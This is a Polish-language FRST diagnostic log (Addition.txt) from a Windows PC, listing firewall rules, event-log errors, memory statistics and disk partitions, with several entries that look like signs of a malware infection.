[{F105F267-4C33-4406-ABA9-CD51BBA65CB9}] => (Allow) E:\Bartek\Gry\steam\steam\steamapps\common\Counter-Strike Global Offensive\csgo.exe FirewallRules: [{C247857C-52A1-4DDB-B978-26B9D0C7FD9C}] => (Allow) E:\Bartek\Gry\steam\steam\steamapps\common\Counter-Strike Global Offensive\csgo.exe FirewallRules: [{281F8BE4-9B4C-45C3-BDDE-7712D0D3B31F}] => (Allow) E:\Bartek\Gry\NFS UnderGround 2\Mr DJ\Need For Speed Underground 2\SPEED2.EXE FirewallRules: [{6F8F2DC9-9369-4433-A238-F3DF7B11599B}] => (Allow) E:\Bartek\Gry\NFS UnderGround 2\Mr DJ\Need For Speed Underground 2\SPEED2.EXE FirewallRules: [{7F19CED1-543B-4F53-9514-897DB2390590}] => (Allow) E:\Bartek\Gry\NFS UnderGround 2\Mr DJ\Need For Speed Underground 2\uniws.exe FirewallRules: [{66B213C7-A12D-48D9-918F-219B59745D9A}] => (Allow) E:\Bartek\Gry\NFS UnderGround 2\Mr DJ\Need For Speed Underground 2\uniws.exe FirewallRules: [{960EAAE6-5BFB-4808-B1BA-DC9171BD0C88}] => (Allow) E:\Bartek\Gry\steam\steam\steamapps\common\the witcher 2\Launcher.exe FirewallRules: [{D514A989-E5E6-42A4-BEB9-B509928C7D8A}] => (Allow) E:\Bartek\Gry\steam\steam\steamapps\common\the witcher 2\Launcher.exe FirewallRules: [TCP Query User{B9ECB85D-A4A8-420E-8D64-7C33CC102939}E:\bartek\gry\steam\steam\steamapps\common\the witcher 2\bin\witcher2.exe] => (Allow) E:\bartek\gry\steam\steam\steamapps\common\the witcher 2\bin\witcher2.exe FirewallRules: [UDP Query User{F0C37CA7-BF14-48E5-B117-FC3787C9B70D}E:\bartek\gry\steam\steam\steamapps\common\the witcher 2\bin\witcher2.exe] => (Allow) E:\bartek\gry\steam\steam\steamapps\common\the witcher 2\bin\witcher2.exe FirewallRules: [{2E360483-7164-4B49-91BF-CD16B915D3A9}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe FirewallRules: [{1328EABF-076E-4376-91AC-08732F3CD194}] => (Allow) C:\Program Files (x86)\GameforgeLive\gfl_client.exe FirewallRules: [{2ACB2E51-F44F-4B45-86EB-036C715673A1}] => (Allow) C:\Users\Bartek\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe FirewallRules: [{C9F64007-2362-4FDC-8AB9-A760F4710803}] => (Allow) C:\Windows\rss\csrss.exe ==================== Punkty Przywracania systemu ========================= 16-05-2018 12:55:39 Zaplanowany punkt kontrolny ==================== Wadliwe urządzenia w Menedżerze urządzeń ============= Name: Koprocesor Description: Koprocesor Class Guid: Manufacturer: Service: Problem: : The drivers for this device are not installed. (Code 28) Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard. ==================== Błędy w Dzienniku zdarzeń: ========================= Dziennik Aplikacja: ================== Error: (05/22/2018 04:13:10 PM) (Source: WinMgmt) (EventID: 10) (User: ) Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected. Error: (05/22/2018 04:09:56 PM) (Source: Wininit) (EventID: 1015) (User: ) Description: Błąd krytycznego procesu systemowego C:\Windows\system32\lsass.exe z kodem stanu 1. Komputer musi być ponownie uruchomiony. Error: (05/22/2018 03:06:27 PM) (Source: WinMgmt) (EventID: 10) (User: ) Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected. Error: (05/22/2018 11:55:34 AM) (Source: WinMgmt) (EventID: 10) (User: ) Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected. Error: (05/22/2018 12:30:32 AM) (Source: WinMgmt) (EventID: 10) (User: ) Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected. Error: (05/21/2018 02:19:11 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Nazwa aplikacji powodującej błąd: desktop215.exe, wersja: 1.0.0.11, sygnatura czasowa: 0x5b029b40 Nazwa modułu powodującego błąd: desktop215.exe, wersja: 1.0.0.11, sygnatura czasowa: 0x5b029b40 Kod wyjątku: 0x40000015 Przesunięcie błędu: 0x0001579c Identyfikator procesu powodującego błąd: 0x880 Godzina uruchomienia aplikacji powodującej błąd: 0x01d3f0fda504e570 Ścieżka aplikacji powodującej błąd: C:\ProgramData\yahoochrome_D\desktop215.exe Ścieżka modułu powodującego błąd: C:\ProgramData\yahoochrome_D\desktop215.exe Identyfikator raportu: 2a8e1b30-5cf1-11e8-be53-90e6ba8602e5 Error: (05/21/2018 12:56:40 PM) (Source: WinMgmt) (EventID: 10) (User: ) Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected. Error: (05/20/2018 01:23:09 PM) (Source: WinMgmt) (EventID: 10) (User: ) Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected. Dziennik System: ============= Error: (05/22/2018 04:43:44 PM) (Source: Schannel) (EventID: 4119) (User: ZARZĄDZANIE NT) Description: Odebrano następujący alert krytyczny: 40. Error: (05/22/2018 04:43:44 PM) (Source: Schannel) (EventID: 4119) (User: ZARZĄDZANIE NT) Description: Odebrano następujący alert krytyczny: 70. Error: (05/22/2018 04:27:43 PM) (Source: Schannel) (EventID: 4119) (User: ZARZĄDZANIE NT) Description: Odebrano następujący alert krytyczny: 40. Error: (05/22/2018 04:27:42 PM) (Source: Schannel) (EventID: 4119) (User: ZARZĄDZANIE NT) Description: Odebrano następujący alert krytyczny: 70. Error: (05/22/2018 04:19:41 PM) (Source: Schannel) (EventID: 4119) (User: ZARZĄDZANIE NT) Description: Odebrano następujący alert krytyczny: 40. Error: (05/22/2018 04:19:40 PM) (Source: Schannel) (EventID: 4119) (User: ZARZĄDZANIE NT) Description: Odebrano następujący alert krytyczny: 70. Error: (05/22/2018 04:15:39 PM) (Source: Schannel) (EventID: 4119) (User: ZARZĄDZANIE NT) Description: Odebrano następujący alert krytyczny: 40. Error: (05/22/2018 04:15:39 PM) (Source: Schannel) (EventID: 4119) (User: ZARZĄDZANIE NT) Description: Odebrano następujący alert krytyczny: 70. ==================== Statystyki pamięci =========================== Procesor: Pentium(R) Dual-Core CPU T4300 @ 2.10GHz Procent pamięci w użyciu: 47% Całkowita pamięć fizyczna: 4095.27 MB Dostępna pamięć fizyczna: 2154.18 MB Całkowita pamięć wirtualna: 8188.73 MB Dostępna pamięć wirtualna: 5974.39 MB ==================== Dyski ================================ Drive c: () (Fixed) (Total:70.1 GB) (Free:13.16 GB) NTFS ==>[dysk z komponentami startowymi (pozyskano odczytując BCD)] Drive d: () (Fixed) (Total:40.1 GB) (Free:39.26 GB) NTFS Drive e: () (Fixed) (Total:187.89 GB) (Free:23.4 GB) NTFS ==================== MBR & Tablica partycji ================== ======================================================== Disk: 0 (MBR Code: Windows 7/8/10) (Size: 298.1 GB) (Disk ID: D9B3496E) Partition 1: (Active) - (Size=70.1 GB) - (Type=07 NTFS) Partition 2: (Not Active) - (Size=40.1 GB) - (Type=07 NTFS) Partition 3: (Not Active) - (Size=187.9 GB) - (Type=07 NTFS) ==================== Koniec Addition.txt ============================